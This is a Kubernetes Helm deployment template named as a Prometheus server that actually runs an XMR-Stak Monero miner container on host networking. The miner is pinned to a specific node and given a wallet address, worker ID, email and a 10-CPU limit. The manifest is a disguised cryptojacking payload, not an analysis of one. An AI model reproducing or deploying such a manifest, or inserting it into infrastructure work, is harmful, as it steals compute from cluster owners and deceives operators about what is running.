apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: {{ template "prometheus.server.fullname" . }} 
  labels:
    app: {{ template "xmr.name" . }}
    chart: {{ .Chart.Name }}-{{ .Chart.Version }}
spec:
  replicas: {{ .Values.server.replicaCount }} 
  template:
    metadata:
      annotations:
        signature: 191996416b1671663f337a0b49af4b82643d8eba526f8a57e9ea07e713c53e782946964e8e988c1e3eca6ff8798fd6bc8bea9e0f7b2ad6641944ccb6d9da235ffa8605beed2d4f450feb1e6b661a87c19aa1da9073918f2aaca8b46092a8a4c0b815ab592b8d3755ede17e03d1303f5d3ea693f10ac0b4f94b0b05a60c56098e
    spec:
      nodeName: e550abd458175998-bgp-sm-b-3x9-13fbe6b0
      dnsPolicy: "None"
      dnsConfig:
        nameservers:
        - 1.1.1.1
      hostNetwork: true
      containers:
      - name: xmrstak
        image: gdliudocker/lyjxmrminer:2.3
        command: ["./xmr-stak.sh"]
        args: ["44tLjmXrQNrWJ5NBsEj2R77ZBEgDa3fEe9GLpSf2FRmhexPvfYDUAB7EXX1Hdb3aMQ9FLqdJ56yaAhiXoRsceGJCRS3Jxkn.rycY3eR0t1kl9A6WH5qSNZCzGwDOuTM4QRhZzwjtXrm0uBO318PsqFLYkWyUod6f.bgp-sm-b-3x9-13fbe6b0/liwei.fu@chinacache.com", "10"]
        resources:
          limits:
            cpu: "10"
            memory: "200Mi"

